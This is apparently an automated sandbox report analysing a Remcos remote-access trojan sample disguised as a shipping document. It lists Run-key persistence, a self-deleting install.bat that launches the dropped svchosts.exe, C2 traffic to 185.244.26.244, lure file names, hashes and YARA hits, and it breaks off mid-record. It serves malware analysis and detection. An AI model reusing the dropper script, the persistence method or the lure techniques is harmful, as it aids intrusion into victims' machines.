                              13:20:14API Interceptor1x Sleep call for process: MV OLYMPIC PROGRESS VSL PARTICULARS.exe modified
                              13:20:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run remcos "C:\Users\user\AppData\Roaming\remcos\svchosts.exe"
                              13:20:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run remcos "C:\Users\user\AppData\Roaming\remcos\svchosts.exe"
                              13:20:56API Interceptor329x Sleep call for process: svchosts.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              185.244.26.244MASTERS INSTRUCTIONS.exeGet hashmaliciousBrowse
                                MV OLYMPIC PROGRESS PDA ORDER.exeGet hashmaliciousBrowse
                                  MV OLYMPIC PROGRESS vessel particulars.exeGet hashmaliciousBrowse
                                    MT PEGAS ANGENCY INSTRUCTIONS.exeGet hashmaliciousBrowse
                                      MV GENCO RESOLUTE VOY 1.exeGet hashmaliciousBrowse

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        VAMU-ASIP-TRANSITVAMURUMASTERS INSTRUCTIONS.exeGet hashmaliciousBrowse
                                        • 185.244.26.244
                                        MV OLYMPIC PROGRESS PDA ORDER.exeGet hashmaliciousBrowse
                                        • 185.244.26.244
                                        MV OLYMPIC PROGRESS vessel particulars.exeGet hashmaliciousBrowse
                                        • 185.244.26.244
                                        MT PEGAS ANGENCY INSTRUCTIONS.exeGet hashmaliciousBrowse
                                        • 185.244.26.244
                                        NEW ORDER.exeGet hashmaliciousBrowse
                                        • 185.244.26.200
                                        Passport_ID_jpg.jarGet hashmaliciousBrowse
                                        • 185.244.26.214
                                        MV GENCO RESOLUTE VOY 1.exeGet hashmaliciousBrowse
                                        • 185.244.26.244
                                        Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                        • 185.244.26.200
                                        CU3e1CWzlr.exeGet hashmaliciousBrowse
                                        • 185.244.26.250
                                        odW62S0306.exeGet hashmaliciousBrowse
                                        • 185.244.26.204
                                        ORDEN.exeGet hashmaliciousBrowse
                                        • 185.244.26.196
                                        sB2ppXd9nd1DsMC.exeGet hashmaliciousBrowse
                                        • 185.244.26.241
                                        2CBPOfVTs5QeG8Z.exeGet hashmaliciousBrowse
                                        • 185.244.26.208
                                        i5TiYkAYkWJy1O8.exeGet hashmaliciousBrowse
                                        • 185.244.26.208
                                        NEW ORDERS.exeGet hashmaliciousBrowse
                                        • 185.244.26.227
                                        DHL STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                        • 185.244.26.194
                                        DHLMT-BL-PL-CI08348-SHIPMENT.pdf.xls.exeGet hashmaliciousBrowse
                                        • 185.244.26.221
                                        sf_express_waybill_parcelArrival.docx.exeGet hashmaliciousBrowse
                                        • 185.244.26.221
                                        COVID-19 CDC Secon Outbreak Warning release.exeGet hashmaliciousBrowse
                                        • 185.244.26.221
                                        Kaszfnrcg7.exeGet hashmaliciousBrowse
                                        • 185.244.26.213

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV OLYMPIC PROGRESS VSL PARTICULARS.exe.log
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchosts.exe.log
                                        Process:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Temp\install.bat
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):101
                                        Entropy (8bit):4.955940042858344
                                        Encrypted:false
                                        SSDEEP:3:cQxCvfn9m1WXp5cViEaKC5QIgUGNK0dAIvBkwbM2n:cQ2fE1WXp+NaZ5QnUaKkAIvKwo2n
                                        MD5:C6528F472FA5CE7856BF410C209D67F7
                                        SHA1:37CA0E9867AC88F730591EFAAE207694E83D0942
                                        SHA-256:E43C7CDC0D9CC9959B625E6634B012CC770DA7B77E8EE38F86B62E64864F4C24
                                        SHA-512:1AF7382CAB009FE23AC7D041B474E4E4F2F1EAD5DEB0ADCF13A6FC63B4A8C63FD6D06F562525E04BA5781FB8119493821062730F4B973D1AF5A161FE6912C4CE
                                        Malicious:false
                                        Reputation:low
                                        Preview: PING 127.0.0.1 -n 2 ..start "" "C:\Users\user\AppData\Roaming\remcos\svchosts.exe"..del %0 ..exit ..
                                        C:\Users\user\AppData\Roaming\remcos\logs.dat
                                        Process:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):25
                                        Entropy (8bit):3.593269689515108
                                        Encrypted:false
                                        SSDEEP:3:M1XKe3n:0aS
                                        MD5:89B5667E995FBEB88EDDA0BAC2FD47C4
                                        SHA1:76FB3FE1E77B0F1A5C6014437515F1DB8EAAEC37
                                        SHA-256:EE321AE724EA998CADB15526D3573191C892653D28A8AA7DE43413AE2DCE5E79
                                        SHA-512:F542FC946C29FAECC5D660548B43B1F59C909955FDF162F150426DBB23FDD3CDEFED435254884DBCDACA82529249A7C2C07DC9DC8C5073156056F8A92B28A92F
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ...[ Program Manager ]...
                                        C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):723968
                                        Entropy (8bit):7.755016164218812
                                        Encrypted:false
                                        SSDEEP:12288:DRRwaxEm8nYqQnds1lbcJDp/Hvvi/MIPvTbXI0AqGsR2EcZofPVCtd7:7yTnYqtTcBRHvnIH3r617
                                        MD5:6FB384AF6E5FD9D345650E37B1B58098
                                        SHA1:D4094353B97C47F35057A343049E854DDC01D90D
                                        SHA-256:FC08A11AA7B0C98831ECBFFF1742A3099466919E12CE8169639EC1CDEFB5E2C3
                                        SHA-512:8458B4509AC5636F4BA6E8CB6DE12DB222278DD83E3B63EB193E6067522F91E7AA5FA7C7EE2F0778338A33C9A746432C28557A5D6469BC90A22CED3AEC13CC87
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Metadefender, Detection: 40%, Browse
                                        • Antivirus: ReversingLabs, Detection: 86%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.............. ... ...@....@.. ....................................@.................................H ..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H............6...............3.................................................?.......................................?.......................................?.......................................?.0..........*....0...........(.....*.0...........(.....*.0..H........(.... L#.. .?..a%..^E................+... }uVJZ ry..a+....}......}....*.0..N........ ..,. ..).a%..^E............'.......+%.{...... G..Z .G_.a+.. f..~Z c.J.a+..*...0..;........ .. .'4.a%..^E................+..
                                        C:\Users\user\AppData\Roaming\remcos\svchosts.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.755016164218812
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        File size:723968
                                        MD5:6fb384af6e5fd9d345650e37b1b58098
                                        SHA1:d4094353b97c47f35057a343049e854ddc01d90d
                                        SHA256:fc08a11aa7b0c98831ecbfff1742a3099466919e12ce8169639ec1cdefb5e2c3
                                        SHA512:8458b4509ac5636f4ba6e8cb6de12db222278dd83e3b63eb193e6067522f91e7aa5fa7c7ee2f0778338a33c9a746432c28557a5d6469bc90a22ced3aec13cc87
                                        SSDEEP:12288:DRRwaxEm8nYqQnds1lbcJDp/Hvvi/MIPvTbXI0AqGsR2EcZofPVCtd7:7yTnYqtTcBRHvnIH3r617
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0.............. ... ...@....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4b209e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60A281F6 [Mon May 17 14:47:18 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb20480x53.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x5f0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xb00a40xb0200False0.854182376686data7.76293714446IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0xb40000x5f00x600False0.432942708333data4.22058360528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xb60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0xb40a00x364data
                                        RT_MANIFEST0xb44040x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightVolkswagen
                                        Assembly Version4.0.0.0
                                        InternalNameDnUSdBB.exe
                                        FileVersion4.0.0.0
                                        CompanyNameVolkswagen
                                        LegalTrademarks
                                        Comments2014 Volkswagen Golf
                                        ProductNameExceptionDispatch
                                        ProductVersion4.0.0.0
                                        FileDescriptionExceptionDispatch
                                        OriginalFilenameDnUSdBB.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 24, 2021 13:20:59.062856913 CEST497395888192.168.2.3185.244.26.244
                                        May 24, 2021 13:20:59.141930103 CEST588849739185.244.26.244192.168.2.3
                                        May 24, 2021 13:20:59.723535061 CEST497395888192.168.2.3185.244.26.244
                                        May 24, 2021 13:20:59.801363945 CEST588849739185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:00.426567078 CEST497395888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:00.504420996 CEST588849739185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:05.522675037 CEST497455888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:05.600676060 CEST588849745185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:06.239612103 CEST497455888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:06.317636967 CEST588849745185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:06.927124977 CEST497455888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:07.005256891 CEST588849745185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:12.022463083 CEST497465888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:12.100657940 CEST588849746185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:12.615124941 CEST497465888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:12.694560051 CEST588849746185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:13.208923101 CEST497465888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:13.289000034 CEST588849746185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:18.304776907 CEST497475888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:18.383306026 CEST588849747185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:18.898077965 CEST497475888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:18.975924015 CEST588849747185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:19.490652084 CEST497475888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:19.569814920 CEST588849747185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:24.586220026 CEST497485888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:24.665337086 CEST588849748185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:25.178669930 CEST497485888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:25.256413937 CEST588849748185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:25.756905079 CEST497485888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:25.835342884 CEST588849748185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:30.852503061 CEST497505888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:30.930550098 CEST588849750185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:31.444899082 CEST497505888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:31.524775028 CEST588849750185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:32.038938046 CEST497505888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:32.117052078 CEST588849750185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:37.133511066 CEST497515888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:37.211464882 CEST588849751185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:37.726586103 CEST497515888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:37.804537058 CEST588849751185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:38.304760933 CEST497515888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:38.384146929 CEST588849751185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:43.639974117 CEST497525888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:43.719818115 CEST588849752185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:44.227169991 CEST497525888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:44.305042982 CEST588849752185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:44.805685997 CEST497525888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:44.883714914 CEST588849752185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:49.900419950 CEST497535888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:49.978168011 CEST588849753185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:50.493761063 CEST497535888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:50.571635008 CEST588849753185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:51.087145090 CEST497535888192.168.2.3185.244.26.244
                                        May 24, 2021 13:21:51.164854050 CEST588849753185.244.26.244192.168.2.3
                                        May 24, 2021 13:21:56.166234970 CEST497545888192.168.2.3185.244.26.244

                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:13:19:33
                                        Start date:24/05/2021
                                        Path:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe'
                                        Imagebase:0x350000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:20:14
                                        Start date:24/05/2021
                                        Path:C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xf90000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Start time:13:20:17
                                        Start date:24/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
                                        Imagebase:0xef0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:20:18
                                        Start date:24/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:20:18
                                        Start date:24/05/2021
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:PING 127.0.0.1 -n 2
                                        Imagebase:0xc30000
                                        File size:18944 bytes
                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:20:19
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
                                        Imagebase:0xc10000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 40%, Metadefender, Browse
                                        • Detection: 86%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:13:20:27
